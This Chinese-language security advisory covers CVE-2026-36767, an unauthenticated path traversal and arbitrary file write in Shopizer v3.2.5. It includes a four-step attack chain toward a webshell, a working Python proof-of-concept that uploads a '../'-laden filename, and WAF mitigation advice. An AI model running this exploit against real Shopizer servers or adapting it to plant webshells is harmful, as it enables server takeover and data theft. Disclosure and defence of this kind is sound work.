IPBUF安全漏洞报告
English
CVE-2026-36767 CVSS 10.0 严重

CVE-2026-36767 Shopizer路径遍历导致任意文件写入漏洞

披露日期: 2026-04-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36767
漏洞类型
路径遍历/任意文件写入
CVSS评分
10.0 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Shopizer

相关标签

路径遍历任意文件写入ShopizerRCECVE-2026-36767

漏洞概述

Shopizer v3.2.5 版本存在严重的路径遍历漏洞。由于 /content/images/add 接口未对用户输入进行有效过滤,未经身份认证的攻击者可发送恶意 POST 请求,将任意文件写入服务器可写目录。此漏洞极易被利用植入 Webshell,进而导致服务器被完全控制,造成严重的数据泄露和系统破坏风险。

技术细节

该漏洞的核心原理在于 Shopizer v3.2.5 在处理 /content/images/add 接口的文件上传请求时,未能正确校验用户提供的文件名参数。应用程序直接使用未经净化的文件名进行文件写入操作,允许攻击者通过插入 "../" 序列进行目录遍历攻击。攻击者利用此缺陷,可以将原本应保存在受控目录下的文件写入到服务器的任意可写路径中,例如 Web 应用的根目录。考虑到无需任何认证即可触发该漏洞,攻击者可以自动化上传包含恶意代码的 JSP 文件(Webshell)。一旦上传成功,攻击者只需向该恶意文件发送 HTTP 请求,即可在服务器端执行任意系统命令,从而完全接管服务器。这种漏洞组合了路径遍历与任意文件写入,是导致远程代码执行(RCE)的高危路径。

攻击链分析

STEP 1
侦察
识别互联网上运行 Shopizer v3.2.5 的目标服务器,确认 /content/images/add 接口可访问。
STEP 2
载荷构造
准备包含恶意代码的文件(如 Webshell),并构造包含 ../ 路径遍历序列的文件名。
STEP 3
漏洞利用
向目标服务器发送特制的 POST 请求,利用路径遍历漏洞将文件写入任意可写目录。
STEP 4
执行代码
通过浏览器或工具访问上传的恶意文件,触发服务器端代码执行,获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-36767 Proof of Concept # Target: Shopizer v3.2.5 # Description: Exploits path traversal in /content/images/add to write arbitrary files. target = "http://127.0.0.1:8080" endpoint = "/content/images/add" # Malicious filename using path traversal to write to webroot or temp directory # Example: ../../../../tmp/poc.txt or ../../webapps/ROOT/shell.jsp filename = "../../tmp/poc_test.txt" file_content = b"CVE-2026-36767 Vulnerability Exploited" # Construct the multipart form data files = { 'file': (filename, file_content, 'text/plain') } url = target + endpoint try: response = requests.post(url, files=files) if response.status_code == 200 or response.status_code == 201: print(f"[+] Request sent successfully. Check if file was written at path traversal target.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

影响范围

Shopizer v3.2.5

防御指南

临时缓解措施
建议立即在 WAF 或反向代理层面添加规则,拦截包含路径遍历字符(如 ../)的文件上传请求。同时,检查服务器日志及 Web 目录下是否存在未知新增的可疑文件,如发现异常应立即隔离。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表